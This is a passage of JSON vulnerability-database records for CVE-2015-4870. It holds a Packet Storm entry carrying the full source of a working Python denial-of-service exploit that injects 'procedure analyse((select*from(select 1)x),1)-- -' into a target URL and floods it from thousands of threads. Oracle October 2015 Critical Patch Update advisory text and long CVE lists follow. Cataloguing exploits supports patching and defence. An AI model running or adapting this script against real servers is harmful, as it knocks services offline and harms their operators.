Exiting')\r\n\t\tsys.exit(0)\r\n\t\t\r\n\texcept EOFError:\r\n\t\tprint ('\\n[!] Ctrl + D detected\\n[!] Exiting')\r\n\t\tsys.exit(0)\r\n\r\nif __name__ == '__main__':\r\n\t_start()\r\n \r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39867/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:58", "description": "", "published": "2016-05-28T00:00:00", "type": "packetstorm", "title": "MySQL Procedure Analyse Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4870"], "modified": "2016-05-28T00:00:00", "id": "PACKETSTORM:137232", "href": "https://packetstormsecurity.com/files/137232/MySQL-Procedure-Analyse-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/env python \n \n# Title: MySQL Procedure Analyse DoS Exploit \n# Author: Osanda Malith Jayathissa (@OsandaMalith) \n# E-Mail: osanda[cat]unseen.is \n# Version: Vulnerable upto MySQL 5.5.45 \n# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/ \n# This exploit is compatible with both Python 3.x and 2.x \n# CVE: CVE-2015-4870 \n \nfrom __future__ import print_function \nimport threading \nimport time \nimport sys \nimport os \n \ntry: \nimport urllib.request as urllib2 \nimport urllib.parse as urllib \n \nexcept ImportError: \nimport urllib2 \nimport urllib \n \ntry: input = raw_input \nexcept NameError: pass \n \nhost = \"http://host/xxx.php?id=1'\" \n \npayload = \" procedure analyse((select*from(select 1)x),1)-- -\" \n \npayload = urllib.quote(payload) \nurl = host + payload \nreq = urllib2.Request(url) \nreq.add_header('Accept', '*/*') \nreq.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0') \n#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455') \nreq.add_header('Connection', '') \nreq.add_header('Content-type', 'text/xml') \ncls = lambda: 
os.system('cls') if os.name == 'nt' else os.system('clear') \n \nclass DoS(threading.Thread): \ndef run(self): \nprint(\"{0} started!\".format(self.getName())) \nfor i in range(100): \nurllib2.urlopen(req) \n \ntime.sleep(.2) \nprint(\"{0} finished!\".format(self.getName())) \n \ndef banner(): \nprint (''' \n____ _____ __ \n/'\\\\_/`\\\\ /\\\\ _`\\\\ /\\\\ __`\\\\/\\\\ \\\\ \n/\\\\ \\\\ __ __\\\\ \\\\,\\\\L\\\\_\\\\ \\\\ \\\\/\\\\ \\\\ \\\\ \\\\ \n\\\\ \\\\ \\\\__\\\\ \\\\/\\\\ \\\\/\\\\ \\\\\\\\/_\\\\__ \\\\\\\\ \\\\ \\\\ \\\\ \\\\ \\\\ \\\\ __ \n\\\\ \\\\ \\\\_/\\\\ \\\\ \\\\ \\\\_\\\\ \\\\ /\\\\ \\\\L\\\\ \\\\ \\\\ \\\\\\\\'\\\\\\\\ \\\\ \\\\L\\\\ \\\\ \n\\\\ \\\\_\\\\\\\\ \\\\_\\\\/`____ \\\\\\\\ `\\\\____\\\\ \\\\___\\\\_\\\\ \\\\____/ \n\\\\/_/ \\\\/_/`/___/> \\\\\\\\/_____/\\\\/__//_/\\\\/___/ \n/\\\\___/ \n\\\\/__/ \n____ ____ \n/\\\\ _`\\\\ /\\\\ _`\\\\ \n\\\\ \\\\ \\\\/\\\\ \\\\ ___\\\\ \\\\,\\\\L\\\\_\\\\ \n\\\\ \\\\ \\\\ \\\\ \\\\ / __`\\\\/_\\\\__ \\\\ \n\\\\ \\\\ \\\\_\\\\ \\\\/\\\\ \\\\L\\\\ \\\\/\\\\ \\\\L\\\\ \\\\ \n\\\\ \\\\____/\\\\ \\\\____/\\\\ `\\\\____\\\\ \n\\\\/___/ \\\\/___/ \\\\/_____/ \n \n[*] Author: Osanda Malith Jayathissa (@OsandaMalith) \n[*] E-Mail: osanda[cat]unseen.is \n[*] Website: http://osandamalith.wordpress.com \n[!] Author takes no responsibility of any damage you cause \n[!] Strictly for Educational purposes only \n''') \nprint(\"[*] Host: {0}\".format(host)) \ninput(\"\\n\\t[-] Press Return to launch the attack\\n\") \n \ndef _start(): \ntry: \ncls() \nbanner() \nfor i in range(10000): \nthread = DoS(name = \"[+] Thread-{0}\".format(i + 1)) \nthread.start() \ntime.sleep(.1) \n \nexcept KeyboardInterrupt: \nprint ('\\n[!] Ctrl + C detected\\n[!] Exiting') \nsys.exit(0) \n \nexcept EOFError: \nprint ('\\n[!] Ctrl + D detected\\n[!] 
Exiting') \nsys.exit(0) \n \nif __name__ == '__main__': \n_start() \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/137232/mysqlprocedure-dos.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", 
"CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2020-10-04T21:16:00", "bulletinFamily": "software", "cvelist": ["CVE-1999-0377", "CVE-2010-1622", "CVE-2014-0050", "CVE-2014-0191", "CVE-2014-1569", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-3576", "CVE-2014-3707", "CVE-2014-7923", "CVE-2014-7926", "CVE-2014-7940", "CVE-2014-8146", "CVE-2014-8147", "CVE-2014-8150", "CVE-2014-8275", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0207", "CVE-2015-0208", "CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0285", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0290", "CVE-2015-0291", "CVE-2015-0292", "CVE-2015-0293", "CVE-2015-1787", "CVE-2015-1788", "CVE-2015-1789", "CVE-2015-1790", 
"CVE-2015-1791", "CVE-2015-1792", "CVE-2015-1793", "CVE-2015-1829", "CVE-2015-2522", "CVE-2015-2608", "CVE-2015-2633", "CVE-2015-2642", "CVE-2015-3144", "CVE-2015-3153", "CVE-2015-3183", "CVE-2015-3236", "CVE-2015-4000", "CVE-2015-4730", "CVE-2015-4734", "CVE-2015-4762", "CVE-2015-4766", "CVE-2015-4791", "CVE-2015-4792", "CVE-2015-4793", "CVE-2015-4794", "CVE-2015-4795", "CVE-2015-4796", "CVE-2015-4797", "CVE-2015-4798", "CVE-2015-4799", "CVE-2015-4800", "CVE-2015-4801", "CVE-2015-4802", "CVE-2015-4803", "CVE-2015-4804", "CVE-2015-4805", "CVE-2015-4806", "CVE-2015-4807", "CVE-2015-4809", "CVE-2015-4810", "CVE-2015-4811", "CVE-2015-4812", "CVE-2015-4813", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4817", "CVE-2015-4818", "CVE-2015-4819", "CVE-2015-4820", "CVE-2015-4821", "CVE-2015-4822", "CVE-2015-4823", "CVE-2015-4824", "CVE-2015-4825", "CVE-2015-4826", "CVE-2015-4827", "CVE-2015-4828", "CVE-2015-4830", "CVE-2015-4831", "CVE-2015-4832", "CVE-2015-4833", "CVE-2015-4834", "CVE-2015-4835", "CVE-2015-4836", "CVE-2015-4837", "CVE-2015-4838", "CVE-2015-4839", "CVE-2015-4840", "CVE-2015-4841", "CVE-2015-4842", "CVE-2015-4843", "CVE-2015-4844", "CVE-2015-4845", "CVE-2015-4846", "CVE-2015-4847", "CVE-2015-4848", "CVE-2015-4849", "CVE-2015-4850", "CVE-2015-4851", "CVE-2015-4854", "CVE-2015-4856", "CVE-2015-4857", "CVE-2015-4858", "CVE-2015-4859", "CVE-2015-4860", "CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4863", "CVE-2015-4864", "CVE-2015-4865", "CVE-2015-4866", "CVE-2015-4867", "CVE-2015-4868", "CVE-2015-4869", "CVE-2015-4870", "CVE-2015-4871", "CVE-2015-4872", "CVE-2015-4873", "CVE-2015-4874", "CVE-2015-4875", "CVE-2015-4876", "CVE-2015-4877", "CVE-2015-4878", "CVE-2015-4879", "CVE-2015-4880", "CVE-2015-4881", "CVE-2015-4882", "CVE-2015-4883", "CVE-2015-4884", "CVE-2015-4886", "CVE-2015-4887", "CVE-2015-4888", "CVE-2015-4890", "CVE-2015-4891", "CVE-2015-4892", "CVE-2015-4893", "CVE-2015-4894", "CVE-2015-4895", "CVE-2015-4896", "CVE-2015-4898", "CVE-2015-4899", 
"CVE-2015-4900", "CVE-2015-4901", "CVE-2015-4902", "CVE-2015-4903", "CVE-2015-4904", "CVE-2015-4905", "CVE-2015-4906", "CVE-2015-4907", "CVE-2015-4908", "CVE-2015-4909", "CVE-2015-4910", "CVE-2015-4911", "CVE-2015-4912", "CVE-2015-4913", "CVE-2015-4914", "CVE-2015-4915", "CVE-2015-4916", "CVE-2015-4917"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to: Critical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 270 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at https://blogs.oracle.com/security.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. 
More information about Oracle's use of CVRF is available at: http://www.oracle.com/security-alerts/cpufaq.html#CVRF.\n", "modified": "2016-09-29T00:00:00", "published": "2015-10-20T00:00:00", "id": "ORACLE:CPUOCT2015", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2015", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:21:05", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-1792", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2014-7923", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-3236", "CVE-2015-4868", "CVE-2014-3572", "CVE-2015-0206", "CVE-1999-0377", "CVE-2015-1789", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2014-8150", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-2522", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2015-0288", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-0285", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-3153", "CVE-2015-0207", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2014-8275", "CVE-2015-4869", "CVE-2015-0208", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2014-3570", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2014-8147", 
"CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2014-3707", "CVE-2015-4912", "CVE-2015-0293", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-1788", "CVE-2015-2633", "CVE-2015-4807", "CVE-2014-8146", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-0209", "CVE-2015-3183", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-0204", "CVE-2014-7926", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-1790", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-0291", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4854", "CVE-2015-0287", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-0289", "CVE-2015-4916", "CVE-2015-4826", "CVE-2015-0292", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-0290", "CVE-2015-0205", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-1787", "CVE-2014-3569", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. 
Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle continues to periodically receive reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 153 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "modified": "2016-09-29T00:00:00", "published": "2015-10-20T00:00:00", "id": "ORACLE:CPUOCT2015-2367953", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2015", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}